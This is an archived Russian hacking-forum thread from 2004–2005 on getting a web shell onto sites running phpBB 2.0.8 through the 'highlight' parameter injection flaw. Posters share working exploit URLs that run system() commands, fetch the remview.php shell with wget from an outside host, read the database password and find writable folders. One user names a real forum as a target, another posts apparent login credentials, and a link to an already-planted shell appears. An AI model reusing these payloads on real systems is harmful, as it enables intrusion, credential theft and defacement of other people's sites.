Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group (https://forum.antichat.xyz/showthread.php?t=4546)

onyx3 22.12.2004 00:56

Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group
 
Люди, подскажите плизз.... буду очень признателен:

вот когда я хочу скатать шелл на сервер, используя:


http://имя хоста/modules.php?name=Forums/viewtopic.php?t=44=http://123.123.123.123/remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527


мне в ответ пишет:

he html tags you attempted to use are not allowed

[ Go Back ]

Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group

TaskFall 24.12.2004 16:48

можно закачать shell этой командой:
viewtopic.php?p=1&highlight=%2527.$poster=%60$ls%6 0.%2527&ls=wget%20http://badsite/shell.php

или:
viewtopic.php?p=3906&highlight=%2527.$poster=`wget %09http://badsite/shell.php`.%2527

может такая заморочка быть, типа привилегий нет чтобы файл создавать, ну тогда ищи папки доступные для записи =)

illusion 25.12.2004 00:42

Цитата:

Сообщение от onyx3
http://имя хоста/modules.php?name=Forums/viewtopic.php?t=44=http://123.123.123.123/remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527

Onyx3, а почему ...t=44=... это бред! в твоём случае надо писать без t= !

DarkDante 25.12.2004 06:20

а у меня вообще пишет что такой темы нет :confused:

onyx3 26.12.2004 00:08

Люди, ведь форум находится в : http://имяхоста/modules.php?name=Forums

И не одна из этих комманд чтобы залить шелл не действует!!!
Пишет либо - модуль не активен, либо ошибку Денвера!!!


Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group

virgoz 26.12.2004 21:20

поробуй выполнить команды так:
Цитата:

viewtopic.php?t=1&highlight=%2527.system($_GET[id]).%2527&id=ls -la

vega2k 27.12.2004 00:24

а возможно ли записать открытую на запись, которая находиться на сервере не в папке "форум"

и еще,
Цитата:

может такая заморочка быть, типа привилегий нет чтобы файл создавать, ну тогда ищи папки доступные для записи =)
ну узнал, я какая папка доступна на запись (даже в папке форум), что в запрос надо написать ?

viewtopic.php?a=http://123.123.123.123/remview.php&b=../../db/rem.php&t=4&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527 ???????

типо этого? b=../../db/
а что вместо точек писать? полный путь? где находиться папка?
в таком случае как именно?
что брать за корневой католог?
forum/db/
или полный путь
/usr/home/public_html/forum


не понятно всё это...

P.S.
ведь drwxrwxrwx - это открытая папка на запись.

virgoz 27.12.2004 00:46

да не геморься ты, лучше залей обычным wget'ом и потом скопируй...

onyx3 27.12.2004 23:59

Цитата:

Сообщение от virgoz
поробуй выполнить команды так:

мне в ответ пишет:

The html tags you attempted to use are not allowed

[ Go Back ]

Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group

onyx3 05.01.2005 17:06

Эй ну что кто нибудь встречал такую проблему??

onyx3 10.01.2005 19:15

Эй народ по активнее, по активне

ringer 11.01.2005 23:31

вот форум версии 2.0.8
http://lipetsk.ru/town/forum2/
сам я профан во всем этом
но был рад если его ломанули

frisco_virus 12.01.2005 07:33

pass: pinochet
user: www2

ringer 12.01.2005 16:49

ответ на мой пост?

ringer 12.01.2005 20:18

эээ может кому полезно будет =)
http://forum.serverroom.us/remview.php

onyx3 13.01.2005 02:11

Какие вы можете предложить варианты взлома форму 2.08 , Union не проходит, может ещё какие нибудь есть??? И ещё как можно посматреть папки которые открыты для записи???(прошу написать комманду)

onyx3 14.01.2005 17:39

Народ киньте ссылку где можно скачать remview.php

ringer 14.01.2005 19:59

Free download from http://php.spb.ru/remview/

onyx3 15.01.2005 03:08

Плиззз... напишите какими прогами можно подменять Cookie??? если не сложно то напишите ссылочку...

Algol 15.01.2005 04:38

Цитата:

Сообщение от onyx3
Плиззз... напишите какими прогами можно подменять Cookie??? если не сложно то напишите ссылочку...

CookieEditor
http://antichat.ru/txt/old/progs.shtml

onyx3 17.01.2005 13:38

А как посматреть какие папки открыты на запись???

onyx3 24.01.2005 18:37

помогите плиззззз

onyx3 04.02.2005 15:23

Народ какой коммандой можно посматреть какие папки открыты на запись???

KEZ 04.02.2005 16:11

Дорогие друзья.
Вы хоть раз видели сервер чтоб там было разрешено
`ls` т.е. safe mode?
Я не.
Так что (как у меня в старом видео) - %2527.system($_GET[cmd]).include%2527
INCLUDE нужно для того чтобы кусочек #b( ... убрать из system.

BlackPrince 04.02.2005 16:12

find / -perm -2 -ls

KEZ 04.02.2005 16:12

Смотреть папки, открытые на запись (сервер unix):
ls -la
просто ls - только список, ls -1 - вертикальный

onyx3 07.02.2005 17:22

Цитата:

Сообщение от KEZ
Смотреть папки, открытые на запись (сервер unix):
ls -la
просто ls - только список, ls -1 - вертикальный

А если сервер стоит на винде Хр, то эта комманда не изменится???

YooogI 07.02.2005 22:38

Цитата:

А если сервер стоит на винде Хр, то эта комманда не изменится???
дык kez написал команды для никсов,а ты про винду!на винде cmd!

onyx3 08.02.2005 11:40

Цитата:

Сообщение от YooogI
дык kez написал команды для никсов,а ты про винду!на винде cmd!

Ну вот я так и думал.... а для винды как можно посматреть???

YooogI 08.02.2005 20:53

У себя на тачке:
выполнить cmd
в коммандной help

(-=util=-) 14.02.2005 22:34

Люди, Я непрошу взломать то или это. Мне нужна статья или какоенибудь пояснение как использовать команды как wget ls -la и т.д. в вэб интерфейсе. Хочу разобраться. Цель заливка remview.php. И есть ли сейчас перспектива в дэфейсе такого плана? Заранее благадарен

Rebz 14.02.2005 23:36

wget - заливка файла на сайт
ls - просмотр файлов в папке
ls -la - полный просмотр с правами доступа))
перемещение по каталогам, команда: cd
cd .. - перемещение на каталог выше
wget http://hompaga.ru/remview.php - зальёт тебе remview.php на сайт..

(-=util=-) 15.02.2005 00:56

Можно на примере
http://[Target]/forum/index.php?showtopic=[№]?
Это пример IPB форума ну и остальные аналогично...
Как я понял, что опирирование идёт по средствам адресной строки браузера и всё?

(-=util=-) 15.02.2005 03:53

&highlight=%2527.$poster=`pwd`.%2527 Это как я понял выдаёт дирикторию
Далее это параметры мускула так?
&highlight=%2527.$poster=`bdname`.%2527
&highlight=%2527.$poster=`bdpass`.%2527
Просмотр попок для записи
&highlight=%2527.$poster=`&cmd`.%2527&cmd=cd ..;ls -l

Короче поправте если что то накарябал нетак... =\

(-=util=-) 15.02.2005 15:06

Во! Нашёл :) http://forum.antichat.ru/showthread.php?t=5076

KEZ 15.02.2005 15:13

ЕЕЕЕЕЕЕЕЕЕЕ Я щас убью когото.
Последний раз говорю.
Если ктокто придумал такой сплойт это не значит что он работает!
`ls` не разрешено если не safe mode.
Вот так можно
viewtopic.php?command=uname -a;ls -la&t=10&highlight=%2527.system($_GET[command]).include%2527
ЕЩЁ РАЗ. В конце остается кусок )b# типа того. Он идет в system() т.к. там без скобок.
Поэтому я его сую в ф-ию которая НИЧЕ не возвращает!

KEZ 15.02.2005 15:15

Вообщем уже много людей хотят со мной пообщаться по поводу include в конце. Стучите в асю. И все считают что я не то написал. И потом вылезает ошибка Cannot include ")b#"
Все правильно!
Если надо узнать пароль\логин к базе
http://.../viewtopic.php?t=10&highlight=%2527.$poster=$dbpass wd.%2527

(-=util=-) 15.02.2005 15:42

Ок! Спасибо братуха :) Разобрался!

KEZ 15.02.2005 16:25

Пожалуста... надо в новостях это подправить ))


Время: 20:16